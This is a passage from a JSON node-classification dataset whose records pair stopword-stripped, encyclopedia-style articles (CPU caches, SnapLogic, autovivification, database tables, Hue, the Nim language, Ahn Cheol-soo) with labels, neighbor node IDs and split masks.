flushed somehow alternatively cache entries allowed pages mapped tlb entries flushed access rights pages changed page table also possible operating system ensure virtual aliases simultaneously resident cache operating system makes guarantee enforcing page coloring described early risc processors sparc rs/6000 took approach used recently hardware cost detecting evicting virtual aliases fallen software complexity performance penalty perfect page coloring risen useful distinguish two functions tags associative cache used determine way entry set select used determine cache hit missed second function must always correct permissible first function guess get wrong answer occasionally processors e.g early sparcs caches virtual physical tags virtual tags used way selection physical tags used determining hit miss kind cache enjoys latency advantage virtually tagged cache simple software interface physically tagged cache bears added cost duplicated tags however also miss processing alternate ways cache line indexed probed virtual aliases matches evicted extra area latency mitigated keeping virtual hints cache entry instead virtual tags hints subset hash virtual tag used selecting way cache get data physical tag like virtually tagged cache may virtual hint match physical tag mismatch case cache entry matching hint must evicted cache accesses cache fill address one hint match since virtual hints fewer bits virtual tags distinguishing one another virtually hinted cache suffers conflict misses virtually tagged cache perhaps ultimate reduction virtual hints found pentium 4 willamette northwood cores processors virtual hint effectively two bits cache four-way set associative effectively hardware maintains simple permutation virtual address cache index content-addressable memory cam necessary select right one four ways fetched large physically indexed caches usually secondary caches run problem operating system rather application controls pages collide one another cache differences page allocation one program run next lead differences cache collision patterns lead large differences program performance differences make difficult get consistent repeatable timing benchmark run understand problem consider cpu 1 mib physically indexed direct-mapped level-2 cache 4 kib virtual memory pages sequential physical pages map sequential locations cache 256 pages pattern wraps around label physical page color 0–255 denote cache go locations within physical pages different colors conflict cache programmers attempting make maximum use cache may arrange programs access patterns 1 mib data need cached given time thus avoiding capacity misses also ensure access patterns conflict misses one way think problem divide virtual pages program uses assign virtual colors way physical colors assigned physical pages programmers arrange access patterns code two pages virtual color use time wide literature optimizations e.g loop nest optimization largely coming high performance computing hpc community snag pages use given moment may different virtual colors may physical colors fact operating system assigns physical pages virtual pages randomly uniformly extremely likely pages physical color locations pages collide cache birthday paradox solution operating system attempt assign different physical color pages different virtual colors technique called page coloring although actual mapping virtual physical color irrelevant system performance odd mappings difficult keep track little benefit approaches page coloring simply try keep physical virtual page colors operating system guarantee physical page maps one virtual color virtual aliases processor use virtually indexed caches need extra virtual alias probes miss handling alternatively os flush page cache whenever changes one virtual color another mentioned approach used early sparc rs/6000 designs modern processors multiple interacting on-chip caches operation particular cache completely specified cache size cache block size number blocks set cache set replacement policy cache write policy write-through write-back cache blocks particular cache size associativity typically lower-level caches called level 1 cache smaller number blocks smaller block size fewer blocks set short access times higher-level caches i.e level 2 progressively larger numbers blocks larger block size blocks set relatively longer access times still much faster main memory cache entry replacement policy determined cache algorithm selected implemented processor designers cases multiple algorithms provided different kinds work loads pipelined cpus access memory multiple points pipeline instruction fetch virtual-to-physical address translation data fetch see classic risc pipeline natural design use different physical caches points one physical resource scheduled service two points pipeline thus pipeline naturally ends least three separate caches instruction tlb data specialized particular role victim cache cache used hold blocks evicted cpu cache upon replacement victim cache lies main cache refill path holds blocks data evicted main cache victim cache usually fully associative intended reduce number conflict misses many commonly used programs require associative mapping accesses fact small fraction memory accesses program require high associativity victim cache exploits property providing high associativity accesses introduced norman jouppi dec 1990 intel crystalwell variant haswell processors equipped intel iris pro gt3e embedded graphics 128 mb edram introduced on-package level 4 cache serves victim cache processors level 3 cache skylake processors level 4 cache longer works victim cache one extreme examples cache specialization trace cache also known execution trace cache found intel pentium 4 microprocessors trace cache mechanism increasing instruction fetch bandwidth decreasing power consumption case pentium 4 storing traces instructions already fetched decoded trace cache stores instructions either decoded retired generally instructions added trace caches groups representing either individual basic blocks dynamic instruction traces pentium 4 trace cache stores micro-operations resulting decoding x86 instructions providing also functionality micro-operation cache next time instruction needed decoded micro-ops write coalescing cache special cache part l2 cache amd bulldozer microarchitecture stores l1d caches module go wcc buffered coalesced wcc task reducing number writes l2 cache micro-operation cache μop cache uop cache uc specialized cache stores micro-operations decoded instructions received directly instruction decoders instruction cache instruction needs decoded μop cache checked decoded form re-used cached available instruction decoded cached one early works describing μop cache alternative frontend intel p6 processor family 2001 paper micro-operation cache power aware frontend variable instruction length isa later intel included μop caches sandy bridge processors successive microarchitectures like ivy bridge haswell amd implemented μop cache zen microarchitecture fetching complete pre-decoded instructions eliminates need repeatedly decode variable length complex instructions simpler fixed-length micro-operations simplifies process predicting fetching rotating aligning fetched instructions μop cache effectively offloads fetch decode hardware thus decreasing power consumption improving frontend supply decoded micro-operations μop cache also increases performance consistently delivering decoded micro-operations backend eliminating various bottlenecks cpu fetch decode logic μop cache many similarities trace cache although μop cache much simpler thus providing better power efficiency makes better suited implementations battery-powered devices main disadvantage trace cache leading power inefficiency hardware complexity required heuristic deciding caching reusing dynamically created instruction traces branch target cache branch target instruction cache name used arm microprocessors specialized cache holds first instructions destination taken branch used low-powered processors need normal instruction cache memory system capable delivering instructions fast enough satisfy cpu without one however applies consecutive instructions sequence still takes several cycles latency restart instruction fetch new address causing cycles pipeline bubble control transfer branch target cache provides instructions cycles avoiding delay taken branches allows full-speed operation much smaller cache traditional full-time instruction cache smart cache level 2 level 3 caching method multiple execution cores developed intel smart cache shares actual cache memory cores multi-core processor comparison dedicated per-core cache overall cache miss rate decreases cores need equal parts cache space consequently single core use full level 2 level 3 cache cores inactive furthermore shared cache makes faster share memory among different execution cores another issue fundamental tradeoff cache latency hit rate larger caches better hit rates longer latency address tradeoff many computers use multiple levels cache small fast caches backed larger slower caches multi-level caches generally operate checking fastest level 1 l1 cache first hits processor proceeds high speed smaller cache misses next fastest cache level 2 l2 checked accessing external memory latency difference main memory fastest cache become larger processors begun utilize many three levels on-chip cache price-sensitive designs used pull entire cache hierarchy on-chip 2010s highest-performance designs returned large off-chip caches often implemented edram mounted multi-chip module fourth cache level benefits l3 l4 caches depend application access patterns examples products incorporating l3 l4 caches include following finally end memory hierarchy cpu register file considered smallest fastest cache system special characteristic scheduled software—typically compiler allocates registers hold values retrieved main memory example loop nest optimization however register renaming compiler register assignments reallocated dynamically hardware runtime register bank allowing cpu break false data dependencies thus easing pipeline hazards register files sometimes also hierarchy cray-1 circa 1976 eight address eight scalar data registers generally usable also set 64 address b 64 scalar data registers took longer access faster main memory b registers provided cray-1 data cache cray-1 however instruction cache considering chip multiple cores question whether caches shared local core implementing shared cache inevitably introduces wiring complexity one cache per chip rather core greatly reduces amount space needed thus one include larger cache typically sharing l1 cache undesirable resulting increase latency would make core run considerably slower single-core chip however highest-level cache last one called accessing memory global cache desirable several reasons allowing single core use whole cache reducing data redundancy making possible different processes threads share cached data reducing complexity utilized cache coherency protocols example eight-core chip three levels may include l1 cache core one intermediate l2 cache pair cores one l3 cache shared cores shared highest-level cache called accessing memory usually referred last level cache llc additional techniques used increasing level parallelism llc shared multiple cores including slicing multiple pieces addressing certain ranges memory addresses accessed independently separate cache structure instructions data cached separately meaning cache line used cache either instructions data various benefits demonstrated separate data instruction translation lookaside buffers unified structure constraint present cache lines used cache instructions data multi-level caches introduce new design decisions instance processors data l1 cache must also somewhere l2 cache caches called strictly inclusive processors like amd athlon exclusive caches data guaranteed one l1 l2 caches never still processors like intel pentium ii iii 4 require data l1 cache also reside l2 cache although may often universally accepted name intermediate policy two common names non-exclusive partially-inclusive advantage exclusive caches store data advantage larger exclusive l1 cache comparable l2 cache diminishes l2 cache many times larger l1 cache l1 misses l2 hits access hitting cache line l2 exchanged line l1 exchange quite bit work copying line l2 l1 inclusive cache one advantage strictly inclusive caches external devices processors multiprocessor system wish remove cache line processor need processor check l2 cache cache hierarchies enforce inclusion l1 cache must checked well drawback correlation associativities l1 l2 caches l2 cache least many ways l1 caches together effective associativity l1 caches restricted another disadvantage inclusive cache whenever eviction l2 cache possibly corresponding lines l1 also get evicted order maintain inclusiveness quite bit work would result higher l1 miss rate another advantage inclusive caches larger cache use larger cache lines reduces size secondary cache tags exclusive caches require caches size cache lines cache lines swapped l1 miss l2 hit secondary cache order magnitude larger primary cache data order magnitude larger cache tags tag area saved comparable incremental area needed store l1 cache data l2 illustrate specialization multi-level caching cache hierarchy k8 core amd athlon 64 cpu k8 four specialized caches instruction cache instruction tlb data tlb data cache caches specialized k8 also multiple-level caches second-level instruction data tlbs store ptes mapping 4 kb instruction data caches various tlbs fill large unified l2 cache cache exclusive l1 instruction data caches means 8-byte line one l1 instruction cache l1 data cache l2 cache however possible line data cache pte also one tlbs—the operating system responsible keeping tlbs coherent flushing portions page tables memory updated k8 also caches information never stored memory—prediction information caches shown diagram usual class cpu k8 fairly complex branch prediction tables help predict whether branches taken tables predict targets branches jumps information associated instructions level 1 instruction cache unified secondary cache k8 uses interesting trick store prediction information instructions secondary cache lines secondary cache protected accidental data corruption e.g alpha particle strike either ecc parity depending whether lines evicted data instruction primary caches since parity code takes fewer bits ecc code lines instruction cache spare bits bits used cache branch prediction information associated instructions net result branch predictor larger effective history table better accuracy processors kinds predictors e.g store-to-load bypass predictor dec alpha 21264 various specialized predictors likely flourish future processors predictors caches store information costly compute terminology used discussing predictors caches one speaks hit branch predictor predictors generally thought part cache hierarchy k8 keeps instruction data caches coherent hardware means store instruction closely following store instruction change following instruction processors like alpha mips family relied software keep instruction cache coherent stores guaranteed show instruction stream program calls operating system facility ensure coherency computer engineering tag ram used specify possible memory locations currently stored cpu cache simple direct-mapped design fast sram used higher associative caches usually employ content-addressable memory cache reads common cpu operation takes single cycle program execution time tends sensitive latency level-1 data cache hit great deal design effort often power silicon area expended making caches fast possible simplest cache virtually indexed direct-mapped cache virtual address calculated adder relevant portion address extracted used index sram returns loaded data data byte aligned byte shifter bypassed next operation need tag checking inner loop fact tags need even read later pipeline load instruction retired tag loaded data must read checked virtual address make sure cache hit miss cache updated requested cache line pipeline restarted associative cache complicated form tag must read determine entry cache select n-way set-associative level-1 cache usually reads n possible tags n data parallel chooses data associated matching tag level-2 caches sometimes save power reading tags first one data element read data sram adjacent diagram intended clarify manner various fields address used address bit 31 significant bit 0 least significant diagram shows srams indexing multiplexing 4 kb 2-way set-associative virtually indexed virtually tagged cache 64 byte b lines 32-bit read width 32-bit virtual address cache 4 kb 64 b lines 64 lines cache read two time tag sram 32 rows pair 21 bit tags although function virtual address bits 31 6 could used index tag data srams simplest use least significant bits similarly cache 4 kb 4 b read path reads two ways access data sram 512 rows 8 bytes wide modern cache might 16 kb 4-way set-associative virtually indexed virtually hinted physically tagged 32 b lines 32-bit read width 36-bit physical addresses read path recurrence cache looks similar path instead tags vhints read matched subset virtual address later pipeline virtual address translated physical address tlb physical tag read one vhint supplies way cache read finally physical address compared physical tag determine hit occurred sparc designs improved speed l1 caches gate delays collapsing virtual address adder sram decoders see sum addressed decoder early history cache technology closely tied invention use virtual memory scarcity cost semi-conductor memories early mainframe computers 1960s used complex hierarchy physical memory mapped onto flat virtual memory space used programs memory technologies would span semi-conductor magnetic core drum disc virtual memory seen used programs would flat caching would used fetch data instructions fastest memory ahead processor access extensive studies done optimize cache sizes optimal values found depend greatly programming language used algol needing smallest fortran cobol needing largest cache sizes early days microcomputer technology memory access slightly slower register access since 1980s performance gap processor memory growing microprocessors advanced much faster memory especially terms operating frequency memory became performance bottleneck technically possible main memory fast cpu economically viable path taken use plenty low-speed memory also introduce small high-speed cache memory alleviate performance gap provided order magnitude capacity—for price—with slightly reduced combined performance first documented uses tlb ge 645 ibm 360/67 used associative memory tlb first documented use data cache ibm system/360 model 85 68010 released 1982 loop mode considered tiny special-case instruction cache accelerates loops consist two instructions 68020 released 1984 replaced typical instruction cache 256 bytes first 68k series processor feature true on-chip cache memory 68030 released 1987 basically 68020 core additional 256-byte data cache process shrink added burst mode caches 68040 released 1990 split instruction data caches four kilobytes 68060 released 1994 following 8 kb data cache four-way associative 8 kb instruction cache four-way associative 96-byte fifo instruction buffer 256-entry branch cache 64-entry address translation cache mmu buffer four-way associative x86 microprocessors reached clock rates 20 mhz 386 small amounts fast cache memory began featured systems improve performance dram used main memory significant latency 120 ns well refresh cycles cache constructed expensive significantly faster sram memory cells time latencies around 10 ns 25 ns early caches external processor typically located motherboard form eight nine dip devices placed sockets enable cache optional extra upgrade feature versions intel 386 processor could support 16 256 kb external cache 486 processor 8 kb cache integrated directly cpu die cache termed level 1 l1 cache differentiate slower on-motherboard level 2 l2 cache on-motherboard caches much larger common size 256 kb popularity on-motherboard cache continued pentium mmx era made obsolete introduction sdram growing disparity bus clock rates cpu clock rates caused on-motherboard cache slightly faster main memory next development cache implementation x86 microprocessors began pentium pro brought secondary cache onto package microprocessor clocked frequency microprocessor on-motherboard caches enjoyed prolonged popularity thanks amd k6-2 amd k6-iii processors still used socket 7 previously used intel on-motherboard caches k6-iii included 256 kb on-die l2 cache took advantage on-board cache third level cache named l3 motherboards 2 mb on-board cache produced socket 7 became obsolete on-motherboard cache disappeared x86 systems three-level caches used first introduction multiple processor cores l3 cache added cpu die became common total cache sizes increasingly larger newer processor generations recently 2011 uncommon find level 3 cache sizes tens megabytes intel introduced level 4 on-package cache haswell microarchitecture crystalwell haswell cpus equipped gt3e variant intel integrated iris pro graphics effectively feature 128 mb embedded dram edram package l4 cache shared dynamically on-die gpu cpu serves victim cache cpu l3 cache early cache designs focused entirely direct cost cache ram average execution speed recent cache designs also consider energy efficiency fault tolerance goals researchers also explored use emerging memory technologies edram embedded dram nvram non-volatile ram designing caches several tools available computer architects help explore tradeoffs cache cycle time energy area tools include open-source cacti cache simulator open-source simplescalar instruction set simulator modeling 2d 3d sram edram stt-ram reram pcm caches done using destiny tool multi-ported cache cache serve one request time accessing traditional cache normally use single memory address whereas multi-ported cache may request n addresses time n number ports connected processor cache benefit pipelined processor may access memory different phases pipeline another benefit allows concept super-scalar processors different cache levels",
    "neighbors": [
      4098,
      4108,
      2066,
      2071,
      6181,
      8231,
      8233,
      4139,
      2097,
      8253,
      2113,
      6221,
      6247,
      6250,
      4204,
      6252,
      6253,
      6256,
      4211,
      4217,
      10361,
      6268,
      10375,
      146,
      4252,
      10399,
      8352,
      4258,
      6311,
      6314,
      2224,
      2226,
      2234,
      2237,
      4286,
      2241,
      2243,
      6339,
      2269,
      2273,
      10469,
      10485,
      249,
      255,
      6415,
      8474,
      4386,
      2339,
      10543,
      10548,
      309,
      8501,
      8514,
      10562,
      4423,
      6476,
      2383,
      6479,
      2388,
      342,
      344,
      2396,
      6495,
      8543,
      10601,
      10603,
      4465,
      10612,
      373,
      392,
      4491,
      398,
      407,
      409,
      10658,
      10663,
      426,
      10669,
      2480,
      8624,
      10675,
      453,
      6608,
      466,
      10706,
      473,
      8665,
      2524,
      8684,
      10734,
      6639,
      499,
      4596,
      4598,
      10746,
      8700,
      508,
      6663,
      8711,
      10779,
      10781,
      6705,
      4664,
      6715,
      2620,
      10813,
      2623,
      2638,
      604,
      8815,
      630,
      8822,
      638,
      644,
      4743,
      8842,
      8851,
      2708,
      6807,
      8855,
      10909,
      6815,
      8863,
      6818,
      10916,
      4773,
      6821,
      2731,
      2745,
      8890,
      6854,
      4810,
      2764,
      10966,
      731,
      6878,
      10985,
      8944,
      757,
      2805,
      760,
      2814,
      781,
      6926,
      4881,
      2838,
      4886,
      2847,
      6949,
      6950,
      815,
      11062,
      2874,
      9020,
      4928,
      6978,
      11080,
      9044,
      7002,
      7033,
      7039,
      9090,
      9092,
      9095,
      7071,
      2979,
      9126,
      936,
      5051,
      3010,
      3014,
      5073,
      980,
      9174,
      7134,
      9182,
      5088,
      5090,
      995,
      7142,
      1000,
      1005,
      3070,
      7173,
      7187,
      11289,
      1057,
      7218,
      7234,
      3142,
      9302,
      1122,
      3175,
      1137,
      3185,
      5235,
      5237,
      7286,
      3194,
      3197,
      7302,
      7305,
      7313,
      9391,
      11447,
      5309,
      5329,
      11487,
      5354,
      5358,
      3317,
      3323,
      1298,
      9490,
      11539,
      3352,
      1309,
      5417,
      7480,
      5444,
      7505,
      11604,
      3421,
      11613,
      1376,
      3431,
      11629,
      1399,
      1402,
      3457,
      9611,
      3470,
      5518,
      5523,
      1428,
      7601,
      1461,
      1463,
      7607,
      7631,
      3540,
      1499,
      1502,
      5598,
      7653,
      7657,
      9707,
      3575,
      5642,
      9739,
      1548,
      5649,
      7699,
      5655,
      1563,
      3630,
      9774,
      7745,
      5725,
      1635,
      9851,
      1677,
      3725,
      7830,
      7833,
      5793,
      9893,
      7852,
      3762,
      7858,
      9911,
      1736,
      9932,
      7911,
      3820,
      9964,
      1776,
      3835,
      5883,
      7940,
      1798,
      3846,
      1801,
      7963,
      1832,
      5933,
      3886,
      7988,
      1849,
      5948,
      8003,
      3911,
      1871,
      1872,
      8048,
      3960,
      10104,
      3973,
      1933,
      6033,
      8090,
      1967,
      4017,
      8120,
      4030,
      1983,
      1985,
      1998,
      10199,
      10205,
      10220
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10735,
    "label": 7,
    "text": "SnapLogic:snaplogic snaplogic commercial software company provides integration platform service ipaas tools connecting cloud data sources saas applications on-premises business software applications headquartered san mateo ca snaplogic founded 2006 snaplogic headed ex-ceo co-founder informatica gaurav dhillon venture backed andreessen horowitz ignition partners floodgate fund brian mcclendon naval ravikant 2017 company raised 136.3 million december 10 2015 snaplogic announced 37.5 million funding round led microsoft silver lake waterman along existing investors andreessen horowitz ignition partners triangle peak partners made total investment raised 96.3 million snaplogic time announcement snaplogic elastic integration platform consists integration cloud prebuilt connectors called snaps snaplex data processing cloud behind firewall company products referred targeting internet things marketplace connecting data applications devices integration cloud approaches big data integration following tools snaplex self-upgrading elastic execution grid streams data applications databases files social big data sources snaplex run cloud behind firewall hadoop snaps modular collections integration components built specific application data source available analytics big data sources identity management social media online storage erp databases technologies xml json oauth soap rest snap patterns introduced march 2014 help connecting cloud services like amazon redshift salesforce.com workday servicenow on-premises applications databases files company winter 2015 release focused adding tighter security added support hadoop big data integration product line",
    "neighbors": [
      4194,
      4388,
      5960,
      10090,
      467,
      10134,
      11646
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10736,
    "label": 9,
    "text": "Autovivification:autovivification perl programming language autovivification automatic creation new arrays hashes required every time undefined value dereferenced perl autovivification allows programmer refer structured variable arbitrary sub-elements structured variable without expressly declaring existence variable complete structure beforehand contrast programming languages either 1 require programmer expressly declare entire variable structure using referring part 2 require programmer declare part variable structure referring part 3 create assignment part variable referring assigning composing expression refers part perl autovivification contrasted languages python php ruby many c style languages dereferencing null undefined values generally permitted compared html standard named access window object results corresponding globally scoped variables automatically accessible browser-based javascript important remember autovivification happens undefined value dereferenced assignment necessary debugger session illustrates autovivification hash examining debugger session illustrates autovivification hash assigning inner hash hashes several layers deep created automatically without declarations autovivification prevent excessive typing perl support autovivification structure would created follows perl 5.6.1 newer support autovivification file directory handles calling codice_1 undefined variable set filehandle according perl561delta largely eliminates need typeglobs opening filehandles must passed around following example c++ associative containers like codice_2 use codice_3 get value associated key nothing associated key construct another example counting occurrences string similar trick achieved codice_4 method returns iterator element associated key even already exists python built-in codice_5 class subclassed implement autovivificious dictionaries simply overriding codice_6 method added class python v2.5 ways implementing behavior following one simplest instances class print like normal python dictionary objects ruby hashes take block specifying object returned non-existing indexes used implement autovivificious maps java map method computeifabsent used emulate autovivificous maps php arrays natively autovivificious however applies assignment array access es6 introduces new proxy class used implement autovivification features javascript reduced single line code c using indexers c 4.0 dynamics dynamicobject used implementing different syntaxes also",
    "neighbors": [
      8644,
      8582,
      3462,
      8554,
      11674,
      10043,
      10333
    ],
    "mask": "Test"
  },
  {
    "node_id": 10737,
    "label": 1,
    "text": "Table_(database):table database table collection related data held table format within database consists columns rows relational databases flat file databases table set data elements values using model vertical columns identifiable name horizontal rows cell unit row column intersect table specified number columns number rows row identified one values appearing particular column subset specific choice columns uniquely identify rows called primary key table another term relation although difference table usually multiset bag rows relation set allow duplicates besides actual data rows tables generally associated metadata constraints table values within particular columns data table physically stored database views also function relational tables data calculated query time external tables informix oracle example also thought views terms relational model databases table considered convenient representation relation two strictly equivalent instance sql table potentially contain duplicate rows whereas true relation contain duplicate rows call tuples similarly representation table implies particular ordering rows columns whereas relation explicitly unordered however database system guarantee ordering rows unless codice_1 clause specified codice_2 statement queries table equally valid representation relation n -dimensional chart n number attributes table columns example relation two attributes three values represented table two columns three rows two-dimensional graph three points table graph representations equivalent ordering rows significant table duplicate rows non-relational systems hierarchical databases distant counterpart table structured file representing rows table row file column row structure implies row repeating information generally child data segments data stored sequence physical records unlike spreadsheet datatype column ordinarily defined schema describing table sql systems sqlite less strict column datatype definitions",
    "neighbors": [
      8195,
      8201,
      1034,
      10258,
      2068,
      6166,
      1049,
      5658,
      5151,
      9248,
      8230,
      10793,
      10286,
      5691,
      11324,
      9286,
      2632,
      4680,
      9290,
      7756,
      8788,
      10326,
      7767,
      10849,
      9828,
      10340,
      8808,
      2669,
      1146,
      3196,
      10367,
      128,
      8340,
      10389,
      4255,
      5795,
      4261,
      9893,
      4263,
      2217,
      10413,
      10925,
      9397,
      3254,
      7868,
      11457,
      6850,
      2246,
      5833,
      6860,
      11472,
      10459,
      2780,
      734,
      10471,
      6383,
      7412,
      9467,
      4861,
      8979,
      7446,
      11030,
      6424,
      5403,
      11551,
      1314,
      7461,
      2344,
      1341,
      10048,
      2369,
      5953,
      5450,
      2901,
      10069,
      1884,
      864,
      9075,
      888,
      2432,
      899,
      10628,
      10632,
      2456,
      9112,
      10137,
      11674,
      9631,
      9634,
      1446,
      1447,
      7080,
      5546,
      5047,
      3004,
      9177,
      987,
      4065,
      4066,
      7654,
      2025,
      6124,
      2544
    ],
    "mask": "None"
  },
  {
    "node_id": 10738,
    "label": 7,
    "text": "Hue_(Software):hue software hue open-source sql cloud editor licensed apache v2 license hue open source sql cloud editor browsing querying visualizing data goal make self service data querying widespread organizations hue team works provides releases website hue also present major hadoop distributions cdh hdp mapr aws emr demo vms",
    "neighbors": [
      9344,
      8554
    ],
    "mask": "Test"
  },
  {
    "node_id": 10739,
    "label": 9,
    "text": "Nim_(programming_language):nim programming language nim formerly named nimrod imperative general-purpose multi-paradigm statically typed systems compiled programming language designed developed andreas rumpf designed efficient expressive elegant supporting metaprogramming functional message passing procedural object-oriented programming styles providing several features compile time code generation algebraic data types foreign function interface ffi c c++ compiling c c++ objective-c javascript nim statically typed supports compile-time metaprogramming features syntactic macros term rewriting macros term rewriting macros enable library implementations common data structures bignums matrices implemented efficiently builtin language facilities iterators supported used first class entities functions allowing use functional programming methods object-oriented programming supported inheritance multiple dispatch functions generic also overloaded generics enhanced support type classes operator overloading also supported nim includes tunable automatic garbage collection based deferred reference counting cycle detection turned altogether 2014 andrew binstock editor-in-chief dr. dobb journal said nimrod former name ... presents original design straddles pascal python compiles c code javascript today nim compiles c c++ javascript objective-c goal nim fast c expressive python extensive lisp nim initial development started 2006 andreas rumpf project made public 2008 first version nim compiler written pascal using free pascal compiler 2008 version compiler written nim released compiler free open-source software developed community volunteers working andreas rumpf language officially renamed nimrod nim release version 0.10.2 december 2014 syntax nim highly resembles python code blocks nesting statements identified use white-space according offside-rule many keywords identical python equivalents mostly english keywords programming languages use punctuation even though nim supports indentation based syntax like python introduced flexibility whereby one could break statement comma binary operator next line nim also supports user-defined operators nim almost fully style-insensitive two identifiers considered equal differ capitalization underscores long first characters identical details influenced also nim supports uniform function call syntax ufcs identifier equality nim compiler emits optimized c code defers compiling external compiler leverage optimizing portability abilities many compilers supported including clang gnu compiler collection gcc compiler also emit c++ objective-c javascript code allow easy interfacing application programming interfaces apis written languages allows writing applications ios android nim compiler self-hosting meaning written nim language nimble standard package manager used nim package nim modules initially developed dominik picheta also core nim developer newer releases nim come nimble included nimble packages defined codice_1 files contain information package version author license description dependencies files support limited subset nim syntax called nimscript main limitation access ffi scripts allow changing test procedure custom tasks written list packages stored json file freely accessible nim-lang/packages repository github json file provides nimble mapping names packages git mercurial repository urls nimble comes nim compiler possible test nimble environment running codice_2 command reveal version number compilation date time git hash nimble nimble utilizes git must available nimble function well nimble command-line used interface installing removing uninstalling upgrading/patching module packages c2nim transcompiler/transpiler helps generate new bindings translating ansi c code nim code output human-readable nim code meant tweaked hand translation process choosenim developed dominik picheta tool enables developer multiple versions nim compile his/her machine choosenim installs nim official downloads sources enabling easy switching stable development compilers nimfix tool helps convert old-style nimrod code nim code nimfix currently beta-quality pas2nim tool translate object pascal wrappers nim code used translate original pascal sources nim compiler maps easily nim supported free pascal delphi-style classes features unsupported time development maintenance mostly stalled py2nim tool used transpiling python code idiomatic nim code development active plans extend amount python code fully translated nim nim program use library used c c++ program language bindings exist many libraries including gtk+ sdl2 cairo opengl winapi zlib libzip openssl curl nim works postgresql mysql sqlite databases nim interface lua python interpreter following code examples valid nim 0.19.0. subsequent releases nim 1.0 release syntax semantics may change later versions hello world program nim echo hello world echo hello world another version coding hello world ... stdout.write hello world simple demonstration showing many nim features proc reverse string string let str1 reverse echo reversed reverse str1 one exotic features implicit codice_3 variable every procedure nim non-void return type implicit result variable represents value returned loop see invocation codice_4 iterator iterator omitted compiler attempt use codice_5 iterator one defined type specified run overridden oloop stropping method mark explicitly letter sequence special purpose stropping used modern languages instead keywords reserved words used identifiers variables functions stropping allows letter sequence used keyword identifier simplifies parsing example allowing variable named codice_6 without clashing keyword codice_6 nim achieved via backticks allowing reserved word used identifier var type int example metaprogramming nim using template facilities template gentype name fieldname untyped fieldtype typedesc gentype test foo int var x test foo 4566 echo x.foo 4566 codice_8 invoked compile-time codice_9 type created nim ffi used call functions written programming languages compile means libraries written c c++ objective-c javascript used nim source code one aware javascript c c++ objective-c libraries combined program compatible javascript c++ objective-c based compatible c javascript incompatible dynamic client-side web-based language following program demonstrates ease extant c code used directly nim printf d\\n foo 5 code codice_10 function imported nim used project bug tracker wiki hosted github forum presentation nim given o'reilly open source convention oscon 2015",
    "neighbors": [
      2304,
      9345,
      5380,
      8068,
      3462,
      4998,
      1673,
      1802,
      6154,
      8973,
      8082,
      5651,
      9490,
      9875,
      3734,
      1435,
      3613,
      10013,
      5663,
      1952,
      1698,
      5029,
      10744,
      4777,
      5546,
      428,
      5165,
      7983,
      10033,
      1203,
      438,
      4920,
      1470,
      7871,
      963,
      5067,
      8524,
      7889,
      339,
      5588,
      11219,
      6102,
      11221,
      4056,
      9560,
      9561,
      8539,
      8289,
      482,
      6502,
      10470,
      8554,
      9195,
      5356,
      5101,
      1646,
      5612,
      7022,
      8430,
      10480,
      10991,
      2804,
      4341,
      2936,
      5754,
      380,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 10740,
    "label": 4,
    "text": "Ahn_Cheol-soo:ahn cheol-soo ahn cheol-soo born 26 february 1962 south korean politician medical doctor businessperson software entrepreneur two-time former presidential election candidate 2012 2017 ahn currently bareunmirae party candidate seoul mayorship ran independent candidate presidential election 2012 withdrew month election took place support moon jae-in ran 2017 people party nominee founding co-leader party leader people party party bareun party merged bareunmirae party february 2018 prior politics ahn founded ahnlab inc. antivirus software company 1995 chairman board chief learning officer ahnlab september 2012 remains company largest stakeholder prior entering politics ahn served dean graduate school convergence science technology seoul national university september 2012 ahn born 26 february 1962 miryang south korea father military service subsequently moved family busan grew ahn academic child number academic hobbies reading received doctor medicine md master science ms doctor philosophy phd degrees physiology seoul national university 1980 1991 became youngest chief professors dankook university medical college 27 years age marking first career medical doctor ahn met wife whilst university whilst working graduate student pursuing md ahn began gain interest computer software hobby particular antivirus software ahn soon began working antivirus software confronted virus mass-infecting computers korea ahn soon infected virus reverse engineered virus attempt erase disk drive successful program wrote help get rid virus eventually called vaccine ahn distributed free finishing military service medical officer south korean navy leaving behind career medical profession cheol-soo went establish venture company ahnlab inc march 1995 advised software company official ahn previously attempted distribute v3 via samsung brand though samsung rejected ahn offer ahn knowing run business first struggled first several years whilst managing company ahn also attempting get master degree engineering university pennsylvania graduated 1997 ahn eventually received 10 million offer us software giant mcafee ahn met john mcafee personally mcafee struggling expand south korea due ahnlab inc wanted purchase company attempt monopolize anti-virus software market south korea ahn rejected offer despite ahnlab inc struggling selling company would lead widespread redundancies 1999 company began run surplus cih virus became widespread korea people needed buy v3 protect end 1999 ahnlab inc became second biggest computer security company south korea company later became largest computer security company south korea included annual lists korea admired companies korea management association consulting 2004 2008 resigned ceo 2005 served chairman board 2012 ahn revealed john mcafee suggested would acquire ahnlab 10,000,000 rejected offer mentioned patriotic reasons decision saying selling ahnlab might allow foreign firm dominate korean market ahn became outside director posco 2005 2010 2011 chairman company ahn awarded executive master business administration emba degree wharton school san francisco campus 2008 became professor kaist 2008 later beginning 2011 became dean graduate school convergence science technology seoul national university since 2006 ahn offered places main political parties constantly denied chance run independent due opposing factions early september 2011 speculation spread ahn would enter politics competing 26 october seoul mayoral by-election democratic party liberty korea party attempted recruit ahn mayoral by-election though failed due ahn feeling like many voters become disenfranchised main two choices ahn eventually made announcement denouncing opposition ruling party saying sure candidacy deciding watch polls making choice though shared sentiment felt like 'd take lot work help seoul saying ten years work would needed help city analysts stated positioned independent ahn would attract degree support disaffected mainstream political parties wake corruption allegations continuing policy failures ahn polling higher potential candidates 35 second place coming 17 approval rating subsequently polled afterwards reaching 50 ahn eventually n't run despite positive poll ratings instead endorsing park won-soon went win by-election park win attributed ahn endorsement due centrist voters moving park side endorsement alluded standing presidential candidate 2012 book thoughts ahn cheol-soo 19 september 2012 3 p.m. korea standard time ahn held press conference announced intention run 2012 presidential election announcement came months speculation whether ahn going run presidency south korean presidential election held 19 december 2012 address lasted around 20 minutes ahn spent considerable amount time explaining came decision run president republic korea quoting people met exploring candidacy expressed desire new politics ahn one point showed polling stronger moon jae-in polls showing could win park geun-hye candidate would go win election 23 november 2012 8:20 p.m. kst ahn announced would drop race endorsing moon jae-in democratic united party presidential candidate 11 march 2013 ahn announced would run seat national assembly south korea independent candidate by-election district seoul nowon c. election 24 april entering first elected office may 2013 launched new think tank named policy network tomorrow entered assembly ahn began explore creation new party provisionally named new political vision party basis public surveys 26 march 2014 however party process set ahn merged faction liberal democratic party form new politics alliance democracy npad becoming co-chairman new party 